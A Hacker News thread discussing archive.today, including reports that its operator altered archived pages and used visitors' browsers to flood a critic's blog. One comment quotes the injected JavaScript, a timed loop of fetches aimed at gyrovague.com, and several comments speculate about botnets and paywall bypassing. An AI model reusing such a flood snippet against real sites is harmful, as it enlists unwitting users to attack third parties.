Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

There is an post describing the possibility of an organised campaign against archive.today [1] https://algustionesa.com/the-takedown-campaign-against-archi...

How does the tech behind archive.today work in detail? Is there any information out there that goes beyond the Google AI search reply or this HN thread [2]?

[1] https://algustionesa.com/the-takedown-campaign-against-archi... [2] https://news.ycombinator.com/item?id=42816427



If they're under an organised defamation campaign, they're not helping themselves by DDoSing someone else's blog and editing archived pages.


Is that, itself, true or disinformation?


They did edit archived pages. They temporarily did a find/replace on their archive to replace "Nora Puchreiner" (an alias the site operator uses) with "Jani Patokallio" (the name of the blogger who wrote about archive.today's owner). https://megalodon.jp/2026-0219-1634-10/https://archive.ph:44...

They also tampered with their archive for a few of the social media sites (Twitter, Instagram, Blogger) by changing the name of the signed in account to Jani Patokallio. https://megalodon.jp/2026-0220-0320-05/https://archive.is:44...

I think Wikipedia made the right decision, you can't trust an archival service for citations if every time the sysop gets in a row they tamper with their database.


This is so ‘early internet beef’ quaint. What next? Are they going to G-line each other?


It it utterly stupid when you consider that the host needed to replace their username with something to conceal their user accounts.



The Reddit CEO's life isn't in danger from people knowing who he is, to be fair.

I've not seen any evidence of them editing archived pages BUT the DDOSing of gyrovague.com is true and still actively taking place. The author of that blog is Finnish leading archive.today to ban all Finnish IPs by giving them endless captcha loops. After solving the first captcha, the page reloads and a javascript snippet appears in the source that attempts to spam gyrovague.com with repeated fetches.


> I've not seen any evidence of them editing archived pages

There is evidence of this in the article you're commenting on.


How do you know that? Did you see it (do you have a Finnish IP?)?


Yes I have Finnish IP and just before I wrote that post I tested it to make sure it was still happening.

I assume it must be a blanket ban on Finnish IPs as there has been comments about it on Reddit and none of my friends can get it to work either. 5 different ISPs were tried. So at the very least it seems to affect majority of Finnish residential connections.


> just before I wrote that post I tested it to make sure it was still happening

That's awesome. I wish everyone made sure of their facts. Thanks.


This is quite an interesting question. For a single datapoint, I happen to have access to a VPN that's supposedly in Finland, and connecting through that didn't make any captcha loop appear on archive.today. The page worked fine.

Now it's obviously possible that my VPN was whitelisted somehow, or that the GeoIP of it is lying. This is just a singular datapoint.


As another datapoint with Finnish IP from Mullvad VPN: CAPTCHA loop and indeed after solving first CAPTCHA this can be found in page source:

setInterval(function(){fetch("https://gyrovague.com/tag/"+Math.random().toString(36).subst...",{ referrerPolicy:"no-referrer",mode:"no-cors" });},1400);


It’s also pretty common for VPNs to have exit nodes physically located in different counties to where they report those IPs (to GeoIP databases) as having originated from.


VPNs usually don't tell you much about residential experiences.


It was true and visible when reported, yeah.


I've also noticed archive.today injecting suspicious looking ads into archived pages that originally did not have ads.



it gives them a voice.


And that voice is practically shouting, "I AM UNTRUSTWORTHY".


that is not the worst scream (especially after FBI and Russian trail). better to shout anything than to die in silence


What kinda logic is that? If you don't want to die in silence, then shout something sensical. But if you're gonna shout garbage, just die in silence.


People say they want the old weird web back. Well there’s this.


The property of the medium: no one would repost or discuss "something sensical".


Or some shrewd sort of tactician.


archive.today works surprisingly well for me, often succeeding where archive.org fails.

archive.org also complies with takedown requests, so it's worth asking: could the organised campaign against archive.today have something to do with it preserving content that someone wants removed?


They preserve a lot of paywalled content so yeah I'm sure there's enough financial incentives to bother them :(


There was also the recent news about sites beginning to block the Internet Archive. Feels like we are gearing up for the next phase of the information war.


Was that written by AI? It sounds like AI, spends lots of time summarizing other posts, and has no listed author. My AI alarm is going off.


Ars was caught recently using AI to write articles when the AI hallucinated about a blogger getting harassed by someone using AI agents. The article quoted his blog and all the quotes were nonsense.


Even if something is AI generated the author, and the editor, should at least attempt to read back the article. English isn't my native language, so that obviously plays in, but very frequently I find that articles I struggle to read are AI generated, they certainly have that AI feel.

It would be interesting to run the numbers, but I get the feeling that AI generated articles may have a higher LIX number. Authors are then less inclined to "fix" the text, because longer word makes them seem smarter.


"Should" and "will" are completely different things. My kids "should" brush their teeth every night without me having to tell them. But they won't.


Sounds like you're suggesting an RFC for journalists and editors :-)


Yeah, wow. Definitely setting off my AI summary alarm.


Yeah nearly certainly.


A big fear of mine is something happening to archive.is

There is so much is archived there, to lose it all would be a tragedy.


There are number of blog posts like

owner-archive-today . blogspot . com

2 years old, like J.P's first post on AT


They are able to scrape paywalled sites at random, so im guessing a residential botnet is used.


It's funny that residential VPN botnets aren't uncommon now. "Free VPN" if you allow your computer/phone to be an exit point.


But how do they bypass the paywall? They can't just pretend to be Google by changing the user-agent, this wouldn't work all the time, as some websites also check IPs, and others don't even show the full content to Google.

They also cannot hijack data with a residential botnet or buy subscriptions themselves. Otherwise, the saved page would contain information about the logged-in user. It would be hard to remove this information, as the code changes all the time, and it would be easy for the website owner to add an invisible element that identifies the user. I suppose they could have different subscriptions and remove everything that isn't identical between the two, but that wouldn't be foolproof.


On the network layer, I don't know. But on the WWW layer, archive.today operates accounts that are used to log into websites when they are snapshotted. IIRC, the archive.today manipulates the snapshots to hide the fact that someone is logged in, but sometimes fails miserably:

https://megalodon.jp/2026-0221-0304-51/https://d914s229qk4kj...

https://archive.is/Y7z4E

The second shows volth's Github notifications. Volth was a major nix-pkgs contributor, but his Github account disappeared.

https://github.com/orgs/community/discussions/58164


There are some pretty robust browser addons for bypassing article paywalls, notably https://gitflic.ru/project/magnolia1234/bypass-paywalls-fire...

This particular addon is blocked on most western git servers, but can still be installed from Russian git servers. It includes custom paywall-bypassing code for pretty much every news websites you could reasonably imagine, or at least those sites that use conditional paywalls (paywalls for humans, no paywalls for big search engines). It won't work on sites like Substack that use proper authenticated content pages, but these sorts of pages don't get picked up by archive.today either.

My guess would be that archive.today loads such an addon with its headless browser and thus bypasses paywalls that way. Even if publishers find a way to detect headless browsers, crawlers can also be written to operate with traditional web browsers where lots of anti-paywall addons can be installed.


Wow, did not know about the regional blocking of git servers! Makes me wonder what else is kept from the western audience, and for what reason this blocking is happening.

Thanks for sketching out their approach and for the URI.


But don't news websites check for ip addresses to make sure they really are from Google bots?


Most of them don’t check the IP, it would seem. Google acquires new IPs all the time, plus there are a lot of other search systems that news publishers don’t want to accidentally miss out on. It’s mostly just client side JS hiding the content after a time delay or other techniques like that. I think the proportion of the population using these addons is so low, it would cost more in lost SEO for news publishers to restrict crawling to a subset of IPs.


I use this add on. It does get blocked sometimes but they update the rules every couple of weeks.


I thought saved pages sometimes do contain users' IP's?

https://www.reddit.com/r/Advice/comments/5rbla4/comment/dd5x...

The way I (loosely) understand it, when you archive a page they send your IP in the X-Forwarded-For header. Some paywall operators render that into the page content served up, which then causes it to be visible to anyone who clicks your archived link and Views Source.


> But how do they bypass the paywall?

I’m guessing by using a residential botnet and using existing credentials by unknowingly ”victims” by automating their browsers.

> Otherwise, the saved page would contain information about the logged-in user.

If you read this article, theres plenty of evidence they are manipulating the scraped data.

But I’m just speculating here…


But in the article they talk about manipulating users devices to do a DDOS, not scrape websites. And the user going to the archive website is probably not gonna have a subscription, and anyway I'm not sure that simply visiting archive.today will make it able to exfiltrate much information from any other third party website since cookies will not be shared.

I guess if they can control a residential botnet more extensively they would be able to do that, but it would still be very difficult to remove login information from the page, the fact that they manipulated the scraped data for totally unrelated reasons a few times proves nothing in my opinion.


They do remove the login information for their own accoubts (e.g. the one they use for LinkedIn sign-up wall). Their implementation is not perfect, though, which is how the aliases were leaked in the first place.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: